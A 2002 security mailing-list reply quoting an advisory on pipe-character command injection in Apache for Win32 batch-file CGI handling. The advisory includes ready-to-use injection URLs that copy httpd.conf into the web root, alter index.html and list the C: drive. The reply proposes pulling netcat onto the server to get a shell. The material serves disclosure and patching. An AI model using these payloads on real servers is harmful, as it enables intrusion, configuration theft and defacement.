Re: Vulnerability in Apache for Win32 batch file processing - Remote command execution

From: Replugge [Rod] (repluggeat_private)
Date: Thu Mar 21 2002 - 10:39:18 PST

  • Next message: 3APA3A: "NAV to test"

    This was a nice one, if this can do what i think you could do
    something like:
    you could retrieve your netcat with a request like this one, or perhaps
    replacing the "+" for "%20" if it doesn't work.
    with netcat on the box i can think of a 1000 ways how to get a cmd :-)
    PD: This is just an idea, i haven't try it yet 
    On Thu, 2002-03-21 at 18:06, Ory Segal wrote:
    > Vulnerability in Apache for Win32 batch file processing - Remote command
    > execution                         
    > => Author: Ory Segal, Sanctum inc.
    > => Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
    > => Vendor: Apache group
    > => Product: Apache web server (Win32) - Running DOS batch files
    >             Tested on: 
    > 	     - Apache 1.3.23
    > 	     - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat
    > file which 
    >                enables this attack)
    > => Severity: High, remote command execution and arbitrary file viewing.
    > => CVE candidate: CAN-2002-0061 
    >    (
    > => Summary: Because of a the way Apache web server handles DOS batch scripts
    > it is possible to execute remote commands on the web server by using the
    > pipe ('|') character.
    > ** IMPORTANT **
    > The Apache 2.0.x installation is shipped with the default script
    > /cgi-bin/test-cgi.bat
    > which can be exploited, but it should be noted that ANY '.bat' or '.cmd'
    > script
    > will allow exploitation of this vulnerability.
    > => Description: When a request for a DOS batch file (.bat or .cmd) is sent
    > to an Apache
    > web server, the server will spawn a shell interpreter (cmd.exe by default)
    > and
    > will run the script with the parameters sent to it by the user. Because no 
    > proper validation is done on the input, it is possible to send a pipe
    > character
    > ('|') with commands appended to it as parameters to the CGI script, and the
    > shell
    > interpreter will execute them. 
    > Example:
    > 1)
    > http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.
    > conf
    > This request will copy the httpd.conf file residing in the /conf directory
    > of the Apache
    > installation, into the virtual web root where it can be viewed by any user. 
    > 2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
    > This will append the string "Foobar" to the index.html file residing in the
    > virtual
    > web root directory.
    > 3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt
    > This will create a file containing the directory listing of the C: drive, 
    > and will put the file in the virtual web root, where any user can read it.
    > ** Notes: 
    > 1) Url-Decoding is not provided by Apache except for the '+' character which
    > is substituted by a space character. 
    > 2) Spilling the output into the STDOUT would most likely cause Apache to
    > write an 
    > error message since it expects the STDOUT of a CGI script to have an HTTP
    > response format
    > (potential HTTP headers followed by a mandatory blank line followed by a
    > response body).
    > Therefore in order to view the result of a command, it is recommended that
    > you redirect
    > the output to a file under the web server's virtual root.
    > => Solution: Upgrade your Apache web server to: 1.3.24 (which should be
    > available later
    > today), or 2.0.34-beta (which will be published soon). Downloads are located
    > at:
    >  <<apache_advisory.txt>> 
    >           Ory Segal
    >         Sanctum, Inc.
    > ----
    > ///////////////////////////////////////////////////////////////////////////////
    > //==========================>> Security Advisory <<==========================//
    > ///////////////////////////////////////////////////////////////////////////////
    > --------------------------------------------------------------------
    >     Vulnerability in Apache for Win32 batch file processing -
    >                   Remote command execution                         
    > --------------------------------------------------------------------
    > => Author: Ory Segal, Sanctum inc.
    > => Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
    > => Vendor: Apache group
    > => Product: Apache web server (Win32) - Running DOS batch files
    >             Tested on: 
    > 	     - Apache 1.3.23
    > 	     - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which 
    >                enables this attack)
    > => Severity: High, remote command execution and arbitrary file viewing.
    > => CVE candidate: CAN-2002-0061 
    >    (
    > => Summary: Because of a the way Apache web server handles DOS batch scripts
    > it is possible to execute remote commands on the web server by using the
    > pipe ('|') character.
    > ** IMPORTANT **
    > The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat
    > which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script
    > will allow exploitation of this vulnerability.
    > => Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache
    > web server, the server will spawn a shell interpreter (cmd.exe by default) and
    > will run the script with the parameters sent to it by the user. Because no 
    > proper validation is done on the input, it is possible to send a pipe character
    > ('|') with commands appended to it as parameters to the CGI script, and the shell
    > interpreter will execute them. 
    > Example:
    > 1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
    > This request will copy the httpd.conf file residing in the /conf directory of the Apache
    > installation, into the virtual web root where it can be viewed by any user. 
    > 2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
    > This will append the string "Foobar" to the index.html file residing in the virtual
    > web root directory.
    > 3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt
    > This will create a file containing the directory listing of the C: drive, 
    > and will put the file in the virtual web root, where any user can read it.
    > ** Notes: 
    > 1) Url-Decoding is not provided by Apache except for the '+' character which
    > is substituted by a space character. 
    > 2) Spilling the output into the STDOUT would most likely cause Apache to write an 
    > error message since it expects the STDOUT of a CGI script to have an HTTP response format
    > (potential HTTP headers followed by a mandatory blank line followed by a response body).
    > Therefore in order to view the result of a command, it is recommended that you redirect
    > the output to a file under the web server's virtual root.
    > => Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later
    > today), or 2.0.34-beta (which will be published soon). Downloads are located at:
    Rodrigo Gutierrez                   <rodrigoat_private>
    Trustix AS                

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